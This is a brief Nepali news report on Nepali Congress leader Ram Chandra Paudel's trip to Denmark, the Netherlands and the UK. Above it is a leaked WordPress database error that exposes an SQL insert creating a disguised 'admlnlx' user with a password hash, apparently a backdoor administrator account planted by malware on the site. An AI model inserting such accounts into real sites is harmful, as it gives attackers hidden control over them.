WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVTfX9eI6QA9NLhU..t.oI2JvKK4aw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 20:41:23', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २६–
नेपाली काँग्रेसका वरिष्ठ नेता रामचन्द्र पौडेल युरोप प्रस्थान गर्नुभएको छ ।
डेनमार्क नेपाली जनसम्पर्क समितिको अधिवेशनमा भाग लिन उहाँ आज राति ८:३० को ओमन एयरमार्फत त्यसतर्फ प्रस्थान गर्नुभएको हो ।
नेता पौडेलले डेनमार्क जनसम्पर्क समितिको अधिवेशनका साथै नेदरल्याण्ड र बेलायतको जनसम्पर्क समितिको कार्यक्रममासमेत भाग लिने उहाँका स्वकीय सचिव चिरञ्जीवी अधिकारीले जानकारी दिनुभयो । उहाँ फागुन ८ गते स्वदेश फर्कनुहुनेछ ।